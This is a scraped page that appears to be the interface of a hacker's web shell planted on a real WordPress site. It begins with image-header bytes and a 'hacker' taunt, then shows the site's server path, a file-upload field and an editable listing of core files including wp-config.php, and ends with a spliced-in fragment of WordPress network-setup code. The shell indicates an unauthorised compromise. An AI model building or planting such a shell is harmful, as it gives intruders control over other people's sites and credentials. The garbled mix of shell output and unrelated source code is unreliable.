ÿØÿÛ C   iamH4CKEERRRRRRRRRRRS

I am a hacker in the dark of a very cold night

path :/home/u307577120/domains/droneindoor.com.br/public_html

upload file:

List of files:

name file size edit permission action
.htaccess1444 KBOctober 31 2025 08:48:410644
.htaccess.bk714 KBDecember 05 2024 23:54:430644
.private-December 05 2024 23:53:490755
default.php16395 KBDecember 05 2024 23:53:330644
index.php405 KBDecember 05 2024 23:53:400644
license.txt19915 KBOctober 03 2025 03:33:360644
readme.html7409 KBOctober 03 2025 03:33:360644
wp-activate.php7387 KBDecember 05 2024 23:53:390644
wp-admin-December 05 2024 23:53:400755
wp-blog-header.php351 KBDecember 05 2024 23:53:400644
wp-comments-post.php2323 KBDecember 05 2024 23:53:400644
wp-config-sample.php3336 KBDecember 05 2024 23:53:400644
wp-config.php3531 KBDecember 05 2024 23:54:430644
wp-content-October 31 2025 08:48:410755
wp-cron.php5617 KBDecember 05 2024 23:53:390644
wp-includes-December 05 2024 23:53:400755
wp-links-opml.php2502 KBDecember 05 2024 23:53:400644
wp-load.php3937 KBDecember 05 2024 23:53:400644
wp-login.php51367 KBDecember 05 2024 23:53:390644
wp-mail.php8543 KBDecember 05 2024 23:53:400644
wp-settings.php29032 KBDecember 05 2024 23:53:400644
wp-signup.php34385 KBDecember 05 2024 23:53:390644
wp-trackback.php5102 KBDecember 05 2024 23:53:390644
xmlrpc.php3246 KBDecember 05 2024 23:53:390644
tables( 'ms_global' ) as $table => $prefixed_table ) { $wpdb->$table = $prefixed_table; } if ( ! network_domain_check() && ( ! defined( 'WP_ALLOW_MULTISITE' ) || ! WP_ALLOW_MULTISITE ) ) { wp_die( printf( /* translators: 1: WP_ALLOW_MULTISITE, 2: wp-config.php */ __( 'You must define the %1$s constant as true in your %2$s file to allow creation of a Network.' ), 'WP_ALLOW_MULTISITE', 'wp-config.php' ) ); } if ( is_network_admin() ) { // Used in the HTML title tag. $title = __( 'Network Setup' ); $parent_file = 'settings.php'; } else { // Used in the HTML title tag. $title = __( 'Create a Network of WordPress Sites' ); $parent_file = 'tools.php'; } $network_help = '

' . __( 'This screen allows you to configure a network as having subdomains (site1.example.com) or subdirectories (example.com/site1). Subdomains require wildcard subdomains to be enabled in Apache and DNS records, if your host allows it.' ) . '

' . '

' . __( 'Choose subdomains or subdirectories; this can only be switched afterwards by reconfiguring your installation. Fill out the network details, and click Install. If this does not work, you may have to add a wildcard DNS record (for subdomains) or change to another setting in Permalinks (for subdirectories).' ) . '

' . '

' . __( 'The next screen for Network Setup will give you individually-generated lines of code to add to your wp-config.php and .htaccess files. Make sure the settings of your FTP client make files starting with a dot visible, so that you can find .htaccess; you may have to create this file if it really is not there. Make backup copies of those two files.' ) . '

' . '

' . __( 'Add the designated lines of code to wp-config.php (just before /*...stop editing...*/) and .htaccess (replacing the existing WordPress rules).' ) . '

' . '

' . __( 'Once you add this code and refresh your browser, multisite should be enabled. This screen, now in the Network Admin navigation menu, will keep an archive of the added code. You can toggle between Network Admin and Site Admin by clicking on the Network Admin or an individual site name under the My Sites dropdown in the Toolbar.' ) . '

' . '

' . __( 'The choice of subdirectory sites is disabled if this setup is more than a month old because of permalink problems with “/blog/” from the main site. This disabling will be addressed in a future version.' ) . '

' . '

' . __( 'For more information:' ) . '

' . '

' . __( 'Documentation on Creating a Network' ) . '

' . '

' . __( 'Documentation on the Network Screen' ) . '

'; get_current_screen()->add_help_tab( array( 'id' => 'network', 'title' => __( 'Network' ), 'content' => $network_help, ) ); get_current_screen()->set_help_sidebar( '

' . __( 'For more information:' ) . '

' . '

' . __( 'Documentation on Creating a Network' ) . '

' . '

' . __( 'Documentation on the Network Screen' ) . '

' . '

' . __( 'Support forums' ) . '

' ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?>

get_error_codes() ) && 'no_wildcard_dns' === $result->get_error_code() ) { network_step2( $result ); } else { network_step1( $result ); } } else { network_step2(); } } else { network_step2(); } } elseif ( is_multisite() || network_domain_check() ) { network_step2(); } else { network_step1(); } ?>